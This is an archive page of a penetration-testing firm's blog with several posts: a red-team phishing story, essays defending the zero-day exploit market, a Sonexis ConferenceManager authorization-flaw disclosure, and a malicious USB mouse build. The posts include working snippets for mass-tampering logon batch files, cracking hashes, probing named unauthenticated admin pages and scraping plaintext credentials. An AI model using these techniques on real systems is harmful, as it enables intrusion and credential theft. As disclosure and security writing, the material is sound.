Archive for the ‘Research’ Category

Whistleblower Series – The real problem with China isn’t China, it’s you.

Terms like China, APT and Zero-Day are synonymous with Fear, Uncertainty and Doubt (FUD).  The trouble is that, in our opinion anyway, these terms and the articles written around them distract from the actual problem.  For example, in 2011 only 0.12% of compromises were attributed to zero-day exploitation, while 99.88% were attributed to known vulnerabilities.  Yet despite this fact the media continued to write about the zero-day threat as if it were the matter of urgency.  What they really should have been writing about is that the majority of people aren’t protecting their networks properly.  After all, if 99.88% of all compromises were the result of the exploitation of known vulnerabilities, then someone must not have been doing their job.  Moreover, if people are unable to protect their networks from the known threat, how are they ever going to defend against the unknown?

All of the recent press about China and its Advanced Persistent Threat is the same; it distracts from the real problem.  More clearly, the problem isn’t China, Anonymous, LulzSec, or any other FUD-ridden buzzword.  The problem is that networks are not being maintained properly from a security perspective, and so threats are aligning with risks to effect successful penetration.  A large part of the reason why these networks are such soft targets is that their maintainers are sold a false sense of security from both the services and the technology perspective.

In this article we’ll show you how easy it was for us to hack into a sensitive government network that was guarded by industry technologies and testing best practices.  Our techniques deliberately mimicked those used by China.  You’ll notice that the techniques aren’t particularly advanced (despite the fact that the press calls them Advanced) and in fact are based largely on common sense.  You’ll also notice that we don’t exploit a single vulnerability other than the one that exists in a single employee (the human vulnerability).  Because this article is based on an actual engagement, we’ve altered certain aspects of our story to protect our customer and their identity.  We should also mention that since the delivery of this engagement our customer has taken effective steps to defeat this style of attack.

Here’s the story…

We recently (relatively speaking anyway) delivered a nation state style attack against one of our public sector customers.  In this particular case our testing was unrestricted and so we were authorized to perform Physical, Social and Electronic attacks.  We were also allowed to use any techniques and technologies that were available should we feel the need.

Let’s start by explaining that our customer’s network houses databases of sensitive information that would be damaging if exposed.  They also have significantly more political weight and authority than most of the other departments in their area.  The reason they were interested in receiving a nation-state style Penetration Test is that another department within the same area had come under attack by China.

We began our engagement with reconnaissance.  During this process we learned that the target network was reasonably well locked down from a technical perspective.  The external attack surface provided no services or applications into which we could sink our teeth.  We took a few steps back and found that the supporting networks were equally well protected.  We also detected three points where Intrusion Prevention was taking place: one at the state level, one at the department level, and one functioning at the host level.

(It was because of these protections and minimalistic attack surface that our client was considered by many to be highly secure.)

When we evaluated our customer from a social perspective we identified a list of all employees published on a web server hosted by yet another department.  We were able to build micro-dossiers for each employee by matching employee names and locations against various social media sites and studying the respective accounts.  We quickly constructed a list of employees who were not active on specific social networking sites and lined them up as targets for impersonation, just in case we might need to become someone else.

We also found a large document repository (not the first time we’ve found something like this) that was hosted by a different department.  Contained within this repository was a treasure trove of Microsoft Office files with their change logs and associated usernames.  We quickly realized that this repository would be an easy way into our customer’s network.  Not only did it provide a wealth of metadata, but it also provided perfect pretexts for Social Engineering… and yes, it was open to the public.
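Harvesting that metadata takes almost no tooling.  Office (OOXML) documents are ZIP archives, and the author usernames live in plain XML inside docProps/core.xml.  The sketch below is not the tooling we used on the engagement, just a minimal illustration of how usernames leak from a document’s properties:

```python
# Minimal sketch: pull author metadata out of a .docx file.
# OOXML documents are ZIP archives; docProps/core.xml carries the
# creator and last-modified-by usernames that make pretexting easy.
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}

def extract_authors(docx_bytes: bytes) -> dict:
    """Return the creator / lastModifiedBy fields from a .docx file."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    creator = root.find("dc:creator", NS)
    modifier = root.find("cp:lastModifiedBy", NS)
    return {
        "creator": creator.text if creator is not None else None,
        "last_modified_by": modifier.text if modifier is not None else None,
    }
```

Run that over every file in an open repository and you have a ready-made list of names and working relationships.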

(It became glaringly apparent to us that our customer had overlooked their social points of risk and exposure and were highly reliant on technology to protect their infrastructure and information.  It was also apparent that our customer was unaware of their own security limitations with regards to technological protections.  Based on what we read in social forums, they thought that IPS/IDS and Antivirus technologies provided ample protection.)

We downloaded a Microsoft Office document whose change log indicated that it was being passed back and forth between one of our customer’s employees and an employee in a different department.  This was ideal because a trust relationship had already been established and was ripe for the taking.  Specifically, it was “normal” for one party to email this document to the other as a trusted attachment.  That normalcy provided the perfect pretext.

(Identifying a good pretext is critically important when planning Social Engineering attacks.  A pretext is a plausible but false reason for doing something.  Presenting a victim with a good pretext often causes the victim to perform actions that they should not perform.)

Once our document was selected, we had our research team build custom malware specifically for the purpose of embedding it into the Microsoft Office document.  As is the case with all of our malware, we built in automatic self-destruct features and expiration dates that would result in clean deinstallation when triggered.  We also built in covert communication capabilities to help avoid detection.

(Building our own malware was not a requirement but it is something that we do.  Building custom malware ensures that it will not be detected, and it ensures that it will have the right features and functions for a particular engagement.)

Once the malware was built and embedded into the document we tested it in our lab network.  The malware functioned as designed and quickly established connectivity with its command and control servers.   We should mention that we don’t build our malware with the ability to propagate for liability and control reasons.  We like keeping our infections highly targeted and well within scope.

When we were ready to begin our attack we fired off a tool designed to generate a high rate of false positives in Intrusion Detection / Prevention systems and Web Application Firewalls alike.  We ran that tool against our customer’s network through hundreds of different proxies to force the appearance of multiple attack sources.  Our goal was to hide any real network activity behind a storm of false alarms.

(This demonstrates just how easily Intrusion Detection and Prevention systems can be defeated.  These systems trust network data and generate alerts based on that network data.  When an attacker forges network data, that attacker can also forge false alerts.  Generate enough false alerts and you destroy the defender’s ability to effectively monitor the real threat.)

While that tool was running we forged an email to our customer’s employee from the aforementioned trusted source.  That email contained our infected Microsoft Office document as an attachment.  Within three minutes our target received the email and opened the infected attachment, thus activating our malware.  Once activated, our malware connected back to its command and control server and we had successfully penetrated our customer’s internal IT infrastructure.  We’ll call this initial point of Penetration T+1.  Shortly after T+1 we terminated our noise generation attack.

(The success of our infection demonstrates how ineffective antivirus technologies are at preventing infections from unknown types of malware.  T+1 was running a current and well-respected antivirus solution.  That solution did not interfere with our activities.  The success of our penetration at this point further demonstrates the risk introduced by the human factor.  We did not exploit any technological vulnerability but instead exploited human trust.)

Now that we had access we needed to ensure that we kept it.  One of the most important aspects of maintaining access is monitoring user activity.  We began taking screenshots of T+1’s desktop every 10 seconds.  One of those screenshots showed T+1 forwarding our email off to their IT department because they thought that the attachment looked suspicious.  While we were expecting to see rapid incident response, the response never came.  Instead, to our surprise, we received a secondary command and control connection from a newly infected host (T+2).

When we began exploring T+2 we quickly realized that it belonged to our customer’s head of IT Security.  We later learned that he had received the email from T+1 and scanned it with two different antivirus tools.  When the email came back as clean he opened the attachment and infected his own machine.  Suspecting nothing, he continued to work as normal… and so did we.

Next we began exploring the file system on T+1.  When we looked at the directory containing users’ batch files we realized that their Discretionary Access Control Lists (DACLs) granted full permissions to everyone (not just domain users).  More clearly, we could read, write, modify and delete any of the batch files, so we decided to exploit this condition to commit a mass compromise.

To make this a reality, our first task was to identify a share where we could store our malware installer.  This share had to be accessible in such a way that when a batch file was run it could read and execute the installer.  As it turned out, the domain controllers were configured with their entire C:\ drives shared, with the same wide-open DACLs.

We located a path where other installation files were stored on one of the domain controllers.  We placed a copy of our malware into that location and named it “infection.exe”.  Then using a custom script we modified all user batch files to include one line that would run “infection.exe” whenever a user logged into a computer system.  The stage was set…
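The custom script itself isn’t shown above, and it doesn’t need to be sophisticated.  As a minimal sketch of the idea (the share path and installer name below are the hypothetical values from this story, not real infrastructure), appending one run line to every logon batch file looks roughly like this:

```python
# Sketch of the batch-file tampering described above. "DC01" and the
# installer path are hypothetical placeholders; on the engagement a
# custom script performed the equivalent edit against the writable share.
from pathlib import Path

RUN_LINE = r"\\DC01\C$\Installers\infection.exe"

def append_run_line(batch_text: str, run_line: str = RUN_LINE) -> str:
    """Append the installer invocation once, preserving existing content."""
    if run_line in batch_text:
        return batch_text  # already modified; keep the edit idempotent
    if batch_text and not batch_text.endswith("\n"):
        batch_text += "\n"
    return batch_text + run_line + "\n"

def tamper_all(script_dir: str) -> int:
    """Rewrite every .bat file under script_dir; return the count modified."""
    count = 0
    for bat in Path(script_dir).glob("*.bat"):
        original = bat.read_text()
        updated = append_run_line(original)
        if updated != original:
            bat.write_text(updated)
            count += 1
    return count
```

The wide-open DACLs are the whole vulnerability here; the “exploit” is a string append.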

In no time we started receiving connections back from desktop users including but not limited to the desktops belonging to each domain admin.  We also received connections back from domain controllers, exchange servers, file repositories, etc.  Each time someone accessed a system it became infected and fell under our control.

While exploring the desktops of the domain administrators we found that one admin kept a directory called “secret”.  Within that directory were backups for all of the network devices including intrusion prevention systems, firewalls, switches, routers, antivirus, etc.  From that same directory we also extracted Visio diagrams complete with IP addresses, system types, departments, employee telephone lists, addresses, emergency contact information, etc.

At this point we decided that our next step would be to crack all passwords.  We dumped passwords from the domain controller and extracted passwords from the backed up configuration files.  We then fed our hashes to our trusted cracking machine and successfully cracked 100% of the passwords.

(We should note that during the engagement we found that most users had not changed their passwords since their accounts had been created.  We later learned that this was a recommendation made by their IT staff.  The recommendation was based on an article written by a well-respected security figure.)
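The cracking step is just a dictionary attack at heart.  NT hashes are unsalted MD4 digests of the UTF-16LE password, which is why stale, human-chosen passwords fall so quickly: one digest per guess covers every account sharing that password.  The sketch below substitutes SHA-256 for MD4 (MD4 is missing from many modern hashlib builds) purely to illustrate the loop; the hashes and wordlist are made up:

```python
# Illustrative dictionary attack. Real NT hashes are unsalted MD4 over
# the UTF-16LE password; SHA-256 stands in here only because MD4 is
# absent from many modern hashlib builds. The principle is identical:
# precompute one digest per candidate word, then match every account
# against that table in a single pass.
import hashlib

def crack(hashes: dict, wordlist: list) -> dict:
    """Map each username to a recovered password where the wordlist hits."""
    lookup = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    recovered = {}
    for user, digest in hashes.items():
        if digest in lookup:
            recovered[user] = lookup[digest]
    return recovered
```

With no salting and no password rotation, a modest wordlist plus rule mutations is usually enough to recover an entire domain’s worth of credentials.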

With this done, we had achieved an irrecoverable and total infrastructure compromise.  Had we been a true foe, there would have been no effective way to remove our presence from the network.  We achieved all of this without encountering any resistance, without exploiting a single technological vulnerability, without detection (other than the forwarded email of course) and without the help of China.  China might be hostile, but then again so are we.

 

 


83% of businesses have no established security plan (but they’ve got Kool-Aid)

I (Adriel) read an article published by Charles Cooper of c|net regarding small businesses and their apparent near-total lack of security awareness.  The article claims that 77% of small- and medium-sized businesses think that they are secure, yet 83% of those businesses have no established security plan.  These numbers were based on a survey of 1,015 small- and medium-sized businesses carried out by the National Cyber Security Alliance and Symantec.

These numbers don’t surprise me at all and, in fact, I think that this false sense of security is an epidemic across businesses of all sizes, not just small-to-medium.  The question that people haven’t asked is why this false sense of security exists in such a profound way.  Are people really ok with feeling safe when they are in fact vulnerable?  Perhaps they are being lied to and are drinking the Kool-Aid…

What I mean is this.  How many software vendors market their products as secure, only to have someone identify all sorts of critical vulnerabilities in them later?  Have you ever heard a software vendor suggest that their software might not be highly secure?  Not only is the suggestion that all software is secure an absurd one, it is a blatant lie.  A more truthful statement is that all software is vulnerable unless it is mathematically demonstrated to be flawless (which, by the way, is a near impossibility).

Very few software vendors hire third-party vulnerability discovery and exploitation experts to perform genuine reviews of their products.  This is why I always recommend using a third-party service (like us) to vet the software from a security perspective before making a purchase decision.  If the software vendor wants to be privy to the results then they should pay for the engagement, because in the end it will improve the product.  Why should you (their prospective customer) pay to have their product improved?  Shouldn’t that be their responsibility?  Shouldn’t they be doing this as a part of the software development lifecycle?

Security vendors are equally responsible for promoting a false sense of security.  For example, how many antivirus companies market their technology in such a way that it might be perceived as an end-all, be-all solution to email threats, viruses, trojans, etc.?  Have you ever heard an antivirus vendor say anything like “we will protect you from most viruses, worms, etc.”?  Of course not.  That level of honesty would leave doubt in the minds of their customers, which would impede sales.  The truth is, their customers should have doubt, because antivirus products are only partially effective and can be subverted, as we’ve demonstrated before.  Despite this fact, uninformed people still feel safe because they use antivirus software.

Let’s not only pick on antivirus software companies though; what about companies that are supposed to test the security of networks and information systems (like us, for example)?  We discussed this a bit in our “Thank You Anonymous” blog entry.  Most businesses that sell penetration testing services don’t deliver genuine penetration tests, despite the fact that they call their services penetration testing.  What they really sell is the manually vetted product of an automated vulnerability scan.  Moreover, they call this vetting process “manual testing,” and so their customers believe they’ve received a quality penetration test when in fact they are depending on an automated program like Nessus to find flaws in their networks.  This is the equivalent of testing a bulletproof vest with a squirt gun and claiming that it’s been tested with a .50 caliber rifle.  Would you want to wear that vest in battle?

It seems to me that security businesses are so focused on revenue generation that they’ve lost sight of the importance of providing clear, factual, complete and balanced information to the public.  It’s my opinion that their competitive marketing methodologies are a detriment to security and actually help to promote the false sense of security referenced in the c|net article above.  Truth is that good security includes the class of products that I’ve mentioned above but that those products are completely useless without capable, well-informed security experts behind them.  Unfortunately not all security experts are actually experts either (but that’s a different story)…

 

 

 

 

 


Selling zero-days doesn’t increase your risk; here’s why.

The zero-day exploit market is secretive.  People as a whole tend to fear what they don’t understand and substitute speculation for fact.  While very few facts about the zero-day exploit market are publicly available, there are many facts about zero-days themselves that are.  When those facts are studied it becomes clear that the legitimate zero-day exploit market presents an immeasurably small risk (if any), especially when viewed in contrast with known risks.

Many news outlets, technical reporters, freedom-of-information supporters, and even security experts have used the zero-day exploit market to generate Fear, Uncertainty and Doubt (FUD).  While the concept of a zero-day exploit seems ominous, the reality is far less menacing.  People should be significantly more worried about vulnerabilities that exist in the public domain than about those that are zero-day.  The misrepresentations about the zero-day market create a dangerous distraction from the very real issues at hand.

One of the most common misrepresentations is that the zero-day exploit market plays a major role in the creation of malware and in malware’s ability to spread.  Not only is this categorically untrue, but the Microsoft Security Intelligence Report (SIRv11) provides clear statistics showing that malware almost never uses zero-day exploits.  According to SIRv11, less than 6% of malware infections are attributed to the exploitation of vulnerabilities at all.  Of those successful infections, nearly all target known rather than zero-day vulnerabilities.

Malware targets and exploits gullibility far more frequently than technical vulnerabilities.  The “ILOVEYOU” worm is a prime example.  The worm would email itself to a victim with a subject of “I LOVE YOU” and an attachment titled “LOVE-LETTER-FOR-YOU.txt.vbs”.  The attachment was actually a copy of the worm.  When a person attempted to read the attachment they would inadvertently run the copy and infect their own computer.  Once a machine was infected, the worm would begin the process again and email copies of itself to the first 50 email addresses in the victim’s address book.  This technique of exploiting gullibility was so successful that in the first 10 days over 50 million infections were reported.  Had people spent more time educating each other about the risks of socially augmented technical attacks, the impact might have been significantly reduced.

The Morris worm is an example of a worm that did exploit zero-day vulnerabilities to help it spread.  The Morris worm was created in 1988 and proliferated by exploiting multiple zero-day vulnerabilities in various Internet-facing services.  The worm was not intended to be malicious, but ironically a design flaw caused it to malfunction, which resulted in a Denial of Service condition on the infected systems.  The Morris worm existed well before the zero-day exploit market was even a thought, proving that both malware and zero-day exploits will exist with or without the market.  In fact, there is no evidence of any relationship between the legitimate zero-day exploit market and the creation of malware; there is only speculation.

Despite these facts, prominent security personalities have argued that the zero-day exploit market keeps people at risk by preventing the public disclosure of zero-day vulnerabilities.  Bruce Schneier wrote, “a disclosed vulnerability is one that – at least in most cases – is patched”.  His opinion is both assumptive and erroneous, yet it is shared by a large number of security professionals.  The reality is that when a vulnerability is disclosed it is unveiled to both ethical and malicious parties, and those who are responsible for applying patches don’t respond as quickly as those with malicious intent.

According to SIRv11, 99.88% of all compromises were attributed to the exploitation of known (publicly disclosed) and not zero-day vulnerabilities.  Of those vulnerabilities over 90% had been known for more than one year. Only 0.12% of compromises reported were attributed to the exploitation of zero-day vulnerabilities. Without the practice of public disclosure or with the responsible application of patches the number of compromises identified in SIRv11 would have been significantly reduced.

The Verizon 2012 Data Breach Investigations Report (DBIR) also provides some interesting insight into compromises.  According to DBIR 97% of breaches were avoidable through simple or intermediate controls (known / detectable vulnerabilities, etc.), 92% were discovered by a third party and 85% took two weeks or more to discover. These statistics further demonstrate that networks are not being managed responsibly. People, and not the legitimate zero-day exploit market, are keeping themselves at risk by failing to responsibly address known vulnerabilities.  A focus on zero-day defense is an unnecessary distraction for most.

Another issue is the notion that security researchers should give their work away for free.  Initially it was risky for researchers to notify vendors about security flaws in their technology.  Some vendors attempted to quash the findings with legal threats, and others would treat researchers with such hostility that it would drive them to the black market.  Some vendors remain hostile even today, but most will happily accept a researcher’s hard work provided that it’s delivered free of charge.  To us, the notion that security researchers should give their work away for free is absurd.

Programs like ZDI and what was once iDefense (acquired by VeriSign) offer relatively small bounties to researchers who provide vulnerability information.  When a new vulnerability is reported these programs notify their paying subscribers well in advance of the general public.  They do make it a point to work with the manufacturer to close the hole but only after they’ve made their bounty.  Once the vendors have been notified (and ideally a fix created) public disclosure ensues in the form of an email-based security advisory that is sent to various email lists.  At that point, those who have not applied the fix are at a significantly increased level of risk.

Companies like Google and Microsoft are stellar examples of what software vendors should do with regards to vulnerability bounty programs.  Their programs motivate the research community to find and report vulnerabilities back to the vendor.  The existence of these programs is a testament to how seriously both Google and Microsoft take product security. Although these companies (and possibly others) are moving in the right direction, they still have to compete with prices offered by other legitimate zero-day buyers.  In some cases those prices offered are as much as 50% higher.

Netragard is one of those entities. We operate the Exploit Acquisition Program (EAP), which was established in early 2000 as a way to provide ethical security researchers with top dollar for their work product. In 2011 Netragard’s minimum acquisition price (payment to researcher) was $20,000.00, which is significantly greater than the minimum payout from most other programs.  Netragard’s EAP buyer information, as with any business’ customer information, is kept in the highest confidence.  Netragard’s EAP does not practice public vulnerability disclosure for the reasons cited above.

Unlike VUPEN, Netragard will only sell its exploits to US-based buyers under contract.  This decision was made to prevent the accidental sale of zero-day exploits to potentially hostile third parties and to prevent any distribution to the Black Market.  Netragard also welcomes the exclusive sale of vulnerability information to software vendors who wish to fix their own products.  Despite this, not a single vendor has approached Netragard with the intent to purchase vulnerability information.  This seems to indicate that most software vendors are still more focused on revenue than they are on end-user security.  This is unfortunate because software vendors are the source of the vulnerabilities.

Most software vendors do not hire developers who are truly proficient at writing safe code (the proof is in the statistics).  Additionally, very few software vendors have genuine security testing incorporated into their Quality Assurance process.  As a result, software vendors literally (and usually accidentally) create the vulnerabilities that are exploited by hackers and used to compromise their customers’ networks.  Yet software vendors continue to inaccurately tout their software as being secure when in fact it isn’t.

If software vendors begin to produce truly secure software then the zero-day exploit market will cease to exist or will be forced to make dramatic transformations. Malware however would continue to thrive because it is not exploit dependent.  We are hopeful that Google and Microsoft will be trend setters and that other software vendors will follow suit.  Finally, we are hopeful that people will do their own research about the zero-day exploit markets instead of blindly trusting the largely speculative articles that have been published recently.



Netragard on Exploit Brokering

Historically, ethical researchers would provide their findings free of charge to software vendors for little more than a mention.  In some cases vendors would react by threatening legal action, citing violations of poorly written copyright laws including but not limited to the DMCA.  To put this into perspective, this is akin to threatening legal action against a driver for pointing out that the brakes on a school bus are about to fail.

This unfriendliness (among various other things) caused some researchers to withdraw from the practice of full disclosure. Why risk doing a vendor the favor of free work when the vendor might try to sue you?

Organizations like CERT help to reduce or eliminate the risk to security researchers who wish to disclose vulnerabilities.  These organizations work as mediators between the researchers and the vendors to ensure safety for both parties.  Other organizations like iDefense and ZDI also work as middlemen, but unlike CERT they earn a profit from the vulnerabilities that they purchase.  While they may pay a security researcher an average of $500-$5,000 per vulnerability, they charge their customers significantly more for their early warning services.  It’s also unclear (to us anyway) how quickly they notify vendors of the vulnerabilities that they buy.

The next level of exploit buyers are the brokers.  Exploit brokers may cater to one or more of three markets that include National, International, or Black.  While Netragard’s program only sells to National buyers, companies like VUPEN sell internationally.  Also unlike VUPEN, Netragard will sell exploits to software vendors willing to engage in an exclusive sale.   Netragard’s Exploit Acquisition Program was created to provide ethical researchers with the ability to receive fair pay for their hard work; it was not created to keep vulnerable software vulnerable.  Our bidding starts at $10,000 per exploit and goes up from there.

 

It’s important to understand what a computer exploit is and is not.  It is a tool or technique that makes full use of and derives benefit from vulnerable computer software.  It is not malware, despite the fact that malware may contain methods for exploitation.  The software vulnerabilities that exploits make use of are created by software vendors during the development process.  The idea that security researchers create vulnerabilities is absurd.  Instead, security researchers study software and find the already existing flaws.

The behavior of an exploit with regards to malevolence or benevolence is defined by the user and not the tool.  Buying an exploit is much like buying a hammer in that they can both be used to do something constructive or destructive.  For this reason it’s critically important that any ethical exploit broker thoroughly vet their customers before selling an exploit.  Any broker that does not thoroughly vet their customers is operating irresponsibly.

What our customers do with the exploits that they buy is none of our business, just as what you do with your laptop is not its vendor’s business.  That being said, any computer system is far more dangerous than any exploit.  An exploit can only target one very specific thing in a very specific way, and it has a limited shelf life.  It is not entirely uncommon for vulnerabilities to be accidentally fixed, rendering a 0-day exploit useless.  A laptop, on the other hand, has an average shelf life of 3 years and can attack anything that’s connected to a network.  In either case, it’s not the laptop or the exploit that represents danger; it’s the intent of the user.

Finally, most of the concerns about malware, spyware, etc. are not only unfounded and unrealistic, but absolutely absurd.  Consider that a business like VUPEN wants to prevent vendors from fixing the vulnerabilities its exploits rely on.  If VUPEN were to provide an exploit to a customer for the purpose of creating malware, that would guarantee the death of the exploit.  Specifically, when malware spreads, antivirus companies capture and study it.  They would most certainly identify the method of propagation (the exploit), which in turn would result in the vendor fixing the vulnerability.


Hacking the Sonexis ConferenceManager

Netragard’s Penetration Testing services use a research-based methodology called Real Time Dynamic Testing™.  Research-based methodologies are different in that they focus on identifying both new and known vulnerabilities, whereas standard methodologies usually, if not always, identify only known vulnerabilities.  Sometimes when performing research-based penetration testing we identify issues that not only affect our customer but also have the potential to impact anyone using a particular technology.  Such was the case with the Sonexis ConferenceManager.

The last time we came across a Sonexis ConferenceManager we found a never before discovered Blind SQL Injection vulnerability.  This time we found a much more serious (also never before discovered) authorization vulnerability. We felt that this discovery deserved a blog entry to help make people aware of the issue as quickly as possible.

What really surprised us about this vulnerability was its simplicity and the fact that nobody (not even us) had found it before.  Discovery and exploitation required no wizardry or special talent.  We simply had to browse to the affected area of the application and we were given the keys to the kingdom (literally).  Even scarier is that this vulnerability could lead to a mass compromise if automated with a specialized Google search (but we won’t give more detail on that here, yet).

So let’s dig in…

All versions of the Sonexis ConferenceManager fail to check whether users attempting to access the “/admin/backup/settings.asp”, “/admin/backup/download.asp” or “/admin/backup/upload.asp” pages are authorized. Because of this, anyone can browse to one of those pages without first authenticating.  When they do, they’ll have full administrative privileges over the respective Sonexis ConferenceManager pages.  A screen shot of the “settings.asp” page is provided below.
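A check for this class of flaw is trivial to script. The sketch below simply requests each of the three pages with no session or credentials at all and flags those that answer successfully; the status-code handling and function names are our own illustrative assumptions, not part of the product:

```python
# Sketch of a check for the missing authorization control described above.
# The three paths come from our findings; everything else is illustrative.
UNPROTECTED = [
    "/admin/backup/settings.asp",
    "/admin/backup/download.asp",
    "/admin/backup/upload.asp",
]

def unauthenticated_pages(base_url, fetch=None):
    """Return the admin pages that answer HTTP 200 to a request
    carrying no session cookie or credentials whatsoever."""
    if fetch is None:  # default fetcher; a stub can be injected for testing
        import requests
        fetch = lambda url: requests.get(url, timeout=10).status_code
    base = base_url.rstrip("/")
    return [page for page in UNPROTECTED if fetch(base + page) == 200]
```

A patched system should return nothing here; a vulnerable one returns every page an anonymous visitor can administer.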

The first thing that we noticed when we accessed the page was that the fields were filled out for us.  This made us curious, especially since the credentials appeared to belong to our customer’s domain.  When we looked at the document source we found that we had not only the “User ID:” but also the “Password:” in clear text.
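Pulling those pre-populated values out of the returned HTML takes one regular expression. A minimal sketch follows; the field names “UserID” and “Password” are our guesses for illustration, not Sonexis’s actual markup:

```python
import re

def extract_prefilled_credentials(html):
    """Scrape pre-populated form values out of the settings.asp source.
    The field names below are illustrative, not the vendor's real ones."""
    creds = {}
    for field in ("UserID", "Password"):
        match = re.search(
            r'name="%s"[^>]*\bvalue="([^"]*)"' % field, html, re.IGNORECASE)
        if match:
            creds[field] = match.group(1)
    return creds
```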

As it turned out, compromising our customer’s IT infrastructure was as simple as using the disclosed credentials to VPN into their network.  Once in, we used the same credentials to access Active Directory and to create a second domain administrator account called “netragard”.  We also downloaded the entire password table from Active Directory and began cracking it with hashcat.  While the hashes were cracking, we used our new domain admin account to access any resource that authenticated against Active Directory.  Suffice it to say we had used the Sonexis ConferenceManager vulnerability to compromise the entire IT infrastructure.

But the vulnerabilities didn’t stop there…

As it turns out we could also download the Sonexis ConferenceManager Microsoft SQL database in its entirety.  This was done by changing the configuration in the “settings.asp” page.  Once the backup destination was pointed at a server we controlled, we were able to download the database (after configuring Samba locally).
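The “configuring Samba locally” step just meant standing up a guest-writable share for the appliance to deliver its backup to. A minimal smb.conf fragment of the sort we mean (the share name and path are placeholders, not the values we actually used):

```ini
[backup]
   path = /srv/sonexis-backup
   guest ok = yes
   read only = no
```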

After we downloaded the file (in zip format) we decompressed it.  Decompression revealed the following contents:

Once decompressed, we loaded the files into our local Microsoft SQL database and began to explore the contents.  Not only did we have audio recordings, configuration settings, and other sensitive data, but the administrative password for the Sonexis ConferenceManager was also stored in plain text, as shown in the screen shot below. This in and of itself is yet another vulnerability.

We were able to use the credentials to login to the Sonexis ConferenceManager without issue…

Last but not least…

We found that it was also possible to insert a backdoor into our local copy of the Sonexis ConferenceManager database.  Once the backdoor was created we could re-zip the files and upload the “infected” Microsoft SQL database back to the Sonexis ConferenceManager.  Once loaded, the backdoor activates, allowing the attacker to regain entry to the system.

Regarding vendor notification…

Sonexis was notified on 1/31/2012 about the authorization vulnerabilities disclosed in this article.  Sonexis responded once (with a less than friendly, non-cooperative response) on 2/1/2012 and a second time (with a very friendly, cooperative response) on 2/6/2012.  We replied to the second response, providing the full details of our research.  Sonexis took the information and had a fix ready for their customers the very next day, on 2/7/2012!  They notified their customers that same day with the following email.

We’d like to thank Sonexis for being receptive and working with us.  Not only is that the right thing to do, it showed us that Sonexis takes their customers’ security very seriously.  As it turned out, the initial (less than friendly) response was due to a miscommunication (someone not paying attention to what we were telling them).  The second response came from someone else who was a great pleasure to work with.  Suffice it to say that in the end we were quite impressed with how quickly Sonexis pushed out a fix (and yes, it works; we verified that).

If you are a Sonexis ConferenceManager user we strongly urge you to update your system now.

Updated on: 02-16-2012

This vulnerability can be exploited from the Internet.   The image below shows a small sample of Sonexis ConferenceManager users who are vulnerable.  This sample was identified using a combination of Ruby and a specially crafted Google search.


Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don’t just run automated scans, massage the output, and draft you a report that makes you feel good; that’s what many companies do.  Instead, we “hack” you with a methodology driven by hands-on research, designed to create realistic and elevated levels of threat.  Don’t take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customer’s Incident Response process.  The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customer’s attention) pretty quickly.

McAfee Flags Netragard as a High Risk

Badge of Honor

McAfee was absolutely right; we are “High Risk”, or more appropriately, “High Threat”, which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regards to IT security) is to identify the points where a real threat can make its way into or through your IT infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ (“RTDT”).  Real Time Dynamic Testing™ is a research driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The “Netragard’s Hacker Interface Device” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to compromise a hardened target.  Another article, “Facebook from the hacker’s perspective”, provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers.  Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place.  The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.


Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug one in; when they do, it’s game over, they’re infected. That trick worked great back in the day, but not so much anymore. The first issue is that most people are well aware of the USB stick threat thanks to the many published articles on the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature on Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success, and we wanted something more reliable.

Enter PRION, the evil HID.


 

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but of electronics: a Teensy microcontroller, a micro USB hub (a small one from RadioShack), a mini USB cable (we needed the ends), a micro flash drive (made from one of our Netragard USB streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we chose a fancy Logitech USB mouse as our Hacker Interface Device / attack platform. To turn our Logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that, we disconnected the USB cable from the circuit board in the mouse and put it to the side. Then we used a Dremel tool to shave away the extra plastic on the inside cover of the mouse (there were all sorts of tabs that we could sacrifice). Removing the plastic tabs made room for the new hardware.

